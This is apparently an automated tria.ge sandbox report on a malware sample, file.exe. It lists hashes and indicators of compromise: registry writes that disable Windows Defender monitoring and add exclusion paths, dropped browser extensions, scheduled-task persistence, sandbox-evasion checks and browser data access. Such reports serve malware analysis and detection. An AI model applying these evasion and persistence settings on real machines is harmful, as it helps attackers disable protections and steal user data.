Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
129s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27/10/2022, 10:47
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
5164bbe879fcec47b89953a252fce692
-
SHA1
286c9f91bf8a99cc7714dcccef3b7d666da14318
-
SHA256
4e38bf2b65ef2527c628f54e32aec850b0b4c33d61840dc9b8752282d069d338
-
SHA512
2b942ab2328d00ccda3d9d31a678503a5310243cf2fdec07558d3e7903fe6ad770b0b351c451fc6e9c5813994422b9c4a796d31aac55f00f87c31bbc8778ee02
-
SSDEEP
196608:91O3kAwXLkTqGjp4kAFYyQLmTlU59JdpH0c1:3O3kAw7uKzFLQLylUbtN1
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KlxBVdQvPHUU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wfePzGzbIQGEC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\kLiGIkXWiwtEPvVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\kLiGIkXWiwtEPvVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\prTKcPnPU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EpsxxpNsmYaigCcr = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DyLrXeBYgDUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KlxBVdQvPHUU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EpsxxpNsmYaigCcr = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\prTKcPnPU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EpsxxpNsmYaigCcr = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EpsxxpNsmYaigCcr = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wfePzGzbIQGEC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DyLrXeBYgDUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 29 1372 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1724 Install.exe 2012 Install.exe 1784 uQofUYb.exe 832 vOsWNzL.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\International\Geo\Nation vOsWNzL.exe -
Loads dropped DLL 12 IoCs
pid Process 704 file.exe 1724 Install.exe 1724 Install.exe 1724 Install.exe 1724 Install.exe 2012 Install.exe 2012 Install.exe 2012 Install.exe 1372 rundll32.exe 1372 rundll32.exe 1372 rundll32.exe 1372 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json vOsWNzL.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json vOsWNzL.exe -
Drops file in System32 directory 23 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 vOsWNzL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini uQofUYb.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol uQofUYb.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vOsWNzL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vOsWNzL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 vOsWNzL.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 vOsWNzL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 vOsWNzL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 vOsWNzL.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol uQofUYb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vOsWNzL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 vOsWNzL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 vOsWNzL.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat vOsWNzL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 vOsWNzL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vOsWNzL.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vOsWNzL.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\wfePzGzbIQGEC\xbpkPLA.xml vOsWNzL.exe File created C:\Program Files (x86)\DyLrXeBYgDUn\JLDPBDG.dll vOsWNzL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja vOsWNzL.exe File created C:\Program Files (x86)\KlxBVdQvPHUU2\puJjhMUVBATTn.dll vOsWNzL.exe File created C:\Program Files (x86)\KlxBVdQvPHUU2\gPWbzyl.xml vOsWNzL.exe File created C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR\NCHUsmb.dll vOsWNzL.exe File created C:\Program Files (x86)\prTKcPnPU\gXdYrYN.xml vOsWNzL.exe File created C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR\MFTfhgL.xml vOsWNzL.exe File created C:\Program Files (x86)\wfePzGzbIQGEC\GTziIMi.dll vOsWNzL.exe File created C:\Program Files (x86)\prTKcPnPU\ujMVAT.dll vOsWNzL.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi vOsWNzL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi vOsWNzL.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak vOsWNzL.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bKcODTUCyUvoWvuOBb.job schtasks.exe File created C:\Windows\Tasks\zZBlWYGpCEMqhJzIS.job schtasks.exe File created C:\Windows\Tasks\SOnJrQRHBOIzCQS.job schtasks.exe File created C:\Windows\Tasks\uDKngRYOrVZAGISPK.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1656 schtasks.exe 1464 schtasks.exe 956 schtasks.exe 1756 schtasks.exe 1760 schtasks.exe 1748 schtasks.exe 1136 schtasks.exe 1748 schtasks.exe 1876 schtasks.exe 1152 schtasks.exe 968 schtasks.exe 1948 schtasks.exe 584 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs vOsWNzL.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f000e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" vOsWNzL.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-d5-39-95-6a-87 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root vOsWNzL.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs vOsWNzL.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{69FD3400-29A8-4165-ADDC-06CAEE54FA39}\fa-d5-39-95-6a-87 vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{69FD3400-29A8-4165-ADDC-06CAEE54FA39}\fa-d5-39-95-6a-87 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-d5-39-95-6a-87\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs vOsWNzL.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-d5-39-95-6a-87\WpadDecisionTime = 807ead8202ead801 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" vOsWNzL.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f000e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{69FD3400-29A8-4165-ADDC-06CAEE54FA39} vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates vOsWNzL.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-d5-39-95-6a-87\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings vOsWNzL.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" vOsWNzL.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-d5-39-95-6a-87\WpadDecision = "0" vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs vOsWNzL.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vOsWNzL.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-d5-39-95-6a-87\WpadDecisionReason = "1" vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates vOsWNzL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs vOsWNzL.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 vOsWNzL.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde vOsWNzL.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1268 powershell.EXE 1268 powershell.EXE 1268 powershell.EXE 1444 powershell.EXE 1444 powershell.EXE 1444 powershell.EXE 1364 powershell.EXE 1364 powershell.EXE 1364 powershell.EXE 1756 powershell.EXE 1756 powershell.EXE 1756 powershell.EXE 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe 832 vOsWNzL.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1268 powershell.EXE Token: SeDebugPrivilege 1444 powershell.EXE Token: SeDebugPrivilege 1364 powershell.EXE Token: SeDebugPrivilege 1756 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
